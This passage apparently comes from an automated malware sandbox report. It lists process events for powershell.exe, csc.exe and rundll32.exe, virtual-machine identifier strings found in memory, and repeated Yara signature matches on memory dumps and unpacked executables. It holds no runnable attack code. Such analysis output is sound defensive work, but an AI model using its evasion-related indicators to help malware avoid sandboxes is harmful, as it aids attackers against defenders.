Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: explorer.exe, 0000001C.00000000.595004782.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001C.00000000.576702163.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/ |
Source: explorer.exe, 0000001C.00000000.576702163.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001C.00000000.576702163.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: explorer.exe, 0000001C.00000000.591084127.0000000006900000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: rundll32.exe, 00000002.00000002.606588477.0000000001194000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.606526811.000000000113A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.503035045.0000000001194000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.503071056.0000000001154000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: explorer.exe, 0000001C.00000000.576702163.000000000807B000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: explorer.exe, 0000001C.00000000.1055186586.0000000007F90000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001C.00000000.576870378.000000000813C000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir |
Source: Yara match |
File source: 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.492785568.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493726041.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447927733.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447664966.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447769257.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447430231.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447831794.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447277784.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.494462158.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447956123.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447713846.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 3464, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.493664049.0000000005589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.606847776.000000000528F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.607520760.0000000005E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493600674.000000000550A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.605996346.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000003.552317810.0000028CEBFCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.492785568.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493726041.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447927733.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447664966.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447769257.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447430231.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447831794.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.547761238.0000000006408000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447277784.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.494462158.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447956123.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.447713846.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 3464, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4e394a0.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55b6b40.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.550a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.55894a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.493664049.0000000005589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.606847776.000000000528F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.607520760.0000000005E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.493600674.000000000550A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.605996346.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |